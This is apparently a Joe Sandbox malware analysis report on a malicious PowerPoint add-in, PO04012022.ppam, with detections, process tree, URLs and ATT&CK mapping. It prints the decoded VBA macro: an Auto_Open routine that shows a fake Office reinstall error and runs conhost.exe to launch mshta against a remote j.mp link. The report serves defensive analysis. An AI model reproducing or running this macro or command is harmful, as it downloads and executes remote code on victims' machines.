Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO04012022.ppam

Overview

General Information

Sample Name:PO04012022.ppam
Analysis ID:548357
MD5:d58141c856b4831f0c7deb594c4fd25b
SHA1:87ab8351719c70bc5f611d736e32a8a19fce8a2f
SHA256:a0f6d9d905b64be221a64da385ad1fd14542c93b35f23cdcbedf71febc68a505
Tags:ppam
Infos:

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Queries the volume information (name, serial number etc) of a device
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • POWERPNT.EXE (PID: 324 cmdline: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 2824 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam" MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2676 cmdline: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • conhost.exe (PID: 1444 cmdline: c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd MD5: CE476F23405AADC46039AC13127DF473)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: PO04012022.ppamVirustotal: Detection: 12%Perma Link
Source: PO04012022.ppamReversingLabs: Detection: 27%
Machine Learning detection for sampleShow sources
Source: PO04012022.ppamJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\conhost.exe
Source: conhost.exe, 00000005.00000002.424109476.0000000001B40000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: qwqwae.dString found in binary or memory: http://www.j.mp/
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkaherereroaasdskd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd8
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhhhhtttrroaasdskd:
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhjhjaoskdoaasdskd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahjhtytytyhoaasdskd:
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkahopopopopdskd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/asksdkazxzxzxzxkd
Source: qwqwae.dString found in binary or memory: http://www.j.mp/askswewewewzxzxkd
Source: conhost.exe, 00000005.00000002.424058378.0000000000320000.00000004.00000020.sdmpString found in binary or memory: http://www.j.mp/askswewewewzxzxkdc:

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Class1, Function lol, String mshta: Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"))Name: lol
Source: VBA code instrumentationOLE, VBA macro: Module Module11, Function Auto_OpenName: Auto_Open
Source: PO04012022.ppamVirustotal: Detection: 12%
Source: PO04012022.ppamReversingLabs: Detection: 27%
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE501.tmpJump to behavior
Source: classification engineClassification label: mal60.expl.winPPAM@7/2@0/0
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\conhost.exe c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppamJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\conhost.exe c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkdJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO04012022.LNKJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppamJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection11LSASS MemorySystem Information Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 548357 Sample: PO04012022.ppam Startdate: 05/01/2022 Architecture: WINDOWS Score: 60 15 Multi AV Scanner detection for submitted file 2->15 17 Machine Learning detection for sample 2->17 19 Document contains an embedded VBA macro with suspicious strings 2->19 21 Document exploit detected (process start blacklist hit) 2->21 7 cmd.exe 1 2->7         started        9 POWERPNT.EXE 501 3 2->9         started        process3 process4 11 POWERPNT.EXE 8 15 7->11         started        process5 13 conhost.exe 11->13         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO04012022.ppam13%VirustotalBrowse
PO04012022.ppam28%ReversingLabsDocument-Word.Trojan.Heuristic
PO04012022.ppam100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.j.mp/asksdkaherereroaasdskd0%VirustotalBrowse
http://www.j.mp/asksdkaherereroaasdskd0%Avira URL Cloudsafe
http://www.j.mp/asksdkahjhjhjaoskdoaasdskd0%Avira URL Cloudsafe
http://www.j.mp/asksdkahjhtytytyhoaasdskd:0%Avira URL Cloudsafe
http://www.j.mp/asksdkahopopopopdskd0%Avira URL Cloudsafe
http://www.j.mp/askswewewewzxzxkdc:0%Avira URL Cloudsafe
http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd80%Avira URL Cloudsafe
http://www.j.mp/asksdkahjhhhhtttrroaasdskd:0%Avira URL Cloudsafe
http://www.j.mp/asksdkazxzxzxzxkd0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://www.j.mp/0%Avira URL Cloudsafe
http://www.j.mp/askswewewewzxzxkd0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.j.mp/asksdkaherereroaasdskdqwqwae.dfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/asksdkahjhjhjaoskdoaasdskdqwqwae.dfalse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/asksdkahjhtytytyhoaasdskd:qwqwae.dfalse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/asksdkahopopopopdskdqwqwae.dfalse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/askswewewewzxzxkdc:conhost.exe, 00000005.00000002.424058378.0000000000320000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd8qwqwae.dfalse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/asksdkahjhhhhtttrroaasdskd:qwqwae.dfalse
  • Avira URL Cloud: safe
unknown
http://www.j.mp/asksdkazxzxzxzxkdqwqwae.dfalse
  • Avira URL Cloud: safe
unknown
http://servername/isapibackend.dllconhost.exe, 00000005.00000002.424109476.0000000001B40000.00000002.00020000.sdmpfalse
  • Avira URL Cloud: safe
low
http://www.j.mp/qwqwae.dtrue
  • Avira URL Cloud: safe
unknown
http://www.j.mp/askswewewewzxzxkdqwqwae.dtrue
  • Avira URL Cloud: safe
unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:548357
Start date:05.01.2022
Start time:16:06:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:PO04012022.ppam
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:2
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal60.expl.winPPAM@7/2@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .ppam
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtSetValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO04012022.LNK
Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Jan 5 23:06:18 2022, length=8315, window=hide
Category:dropped
Size (bytes):1019
Entropy (8bit):4.48337186543544
Encrypted:false
SSDEEP:24:8dC5k/XT/4IicoLpNe4H5g/Dv3qAQd7Qy:8wk/XTA559N15FAUj
MD5:7C62E662684F8C5BC941E653A458CD4D
SHA1:D85A723FEADF29F74DDF94D0B95C14608BF00DA4
SHA-256:C53954AFEA57BB99626DDBC48944789CA85089FED74B955DB37B92FA43F6C32D
SHA-512:1FF75E15C9647C0DEBE25EFD99A9674F30A9E530A26502523F3F132D3AF68F04B1AD7B49A3CECC58CC63D4C750F6B82F0AEBA28915F9BAF782C6AD59C889CEAD
Malicious:false
Reputation:low
Preview: L..................F.... ...}..?...}..?...2\.:....{ ...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.{ ..&T.. .PO0401~1.PPA..L.......S ..S .*.........................P.O.0.4.0.1.2.0.2.2...p.p.a.m.......y...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop\PO04012022.ppam.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.0.4.0.1.2.0.2.2...p.p.a.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9..g............[D_....3N...W...9.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):72
Entropy (8bit):4.551277869757234
Encrypted:false
SSDEEP:3:bDuMJltPX+mxW+e+X+v:bCmPu+A
MD5:AD7401DED5269BBF01E6F7C41559C1E4
SHA1:3E06C27F37789359898B4BADFEDF0880B3863214
SHA-256:53575C137FFBC45488C16115E65BC66F8D57C24A63291699AF729DAE52476C1D
SHA-512:984F85FB39DDC38A0C38E579F21D99694D05C70B857B54DC908DA40D715810C18CBBE798D6D4644025B42E0523156E41F8E39A340282AF5C813E1F398E0E99CE
Malicious:false
Reputation:low
Preview: [folders]..Templates.LNK=0..PO04012022.LNK=0..[misc]..PO04012022.LNK=0..

Static File Info

General

File type:Microsoft PowerPoint 2007+
Entropy (8bit):7.633099793344531
TrID:
  • Microsoft PowerPoint Macro-enabled Open XML add-in (32504/1) 80.25%
  • ZIP compressed archive (8000/1) 19.75%
File name:PO04012022.ppam
File size:8801
MD5:d58141c856b4831f0c7deb594c4fd25b
SHA1:87ab8351719c70bc5f611d736e32a8a19fce8a2f
SHA256:a0f6d9d905b64be221a64da385ad1fd14542c93b35f23cdcbedf71febc68a505
SHA512:0b739f25e56fa13d8db7f25e883cbfd0e8d2470adc3c0de45049da8530eec15c4e1627930534bd6356f162f9d7ce2c70c3ea0256805d6eb6ed31f180cda5a1a9
SSDEEP:192:sz8PvSFUzffz6qQaQzGbjeaS1UujK2ho/Erp/Z2i7H:sz8PvQULzCKKQQMEr1t
File Content Preview:PK..........#T^.......U.......[Content_Types].xml...N.0...H.C...dp@......&1..M.6.:Q....I....Ti........r.wb....\....H.U..\.o..{)".U.9.\.1.eq}...=F...s.2....i....GJ....8.C.=.OhP...w.8b$.x.!......X.v.......H.F...;k.SQ.T.>f...A5......K.o..]...7pv........8K...

File Icon

Icon Hash:9e9ab2eaccdcdcdc

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:16:06:19
Start date:05/01/2022
Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding
Imagebase:0x13faa0000
File size:2163560 bytes
MD5 hash:EBBBEF2CCA67822395E24D6E18A3BDF6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:16:06:21
Start date:05/01/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam"
Imagebase:0x4aad0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:06:22
Start date:05/01/2022
Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Wow64 process (32bit):false
Commandline:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam
Imagebase:0x13fbf0000
File size:2163560 bytes
MD5 hash:EBBBEF2CCA67822395E24D6E18A3BDF6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:16:06:26
Start date:05/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd
Imagebase:0xff220000
File size:338432 bytes
MD5 hash:CE476F23405AADC46039AC13127DF473
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis

Call Graph

Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
  • Show Help
callgraph 9 lol 22 Auto_Open 22->9

Module: Class1

Declaration
LineContent
1

Attribute VB_Name = "Class1"

2

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = False

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

Executed Functions
APIsMeta Information

Assert

Shell

Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd") -> 1444
StringsDecrypted Strings
"c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"
LineInstructionMeta Information
9

Public Function lol()

10

Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"))

Assert

Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd") -> 1444

executed
11

End Function

Module: Module11

Declaration
LineContent
1

Attribute VB_Name = "Module11"

Executed Functions
APIsMeta Information

Part of subcall function lol@Class1: Assert

Part of subcall function lol@Class1: Shell

LineInstructionMeta Information
2

Sub Auto_Open()

3

Dim obj as New Class1

executed
4

Debug.Print MsgBox("ERROR!Re-Install Office", vbOKCancel); returns; 1 ' BAD !

5

obj.lol

6

End Sub

Reset < >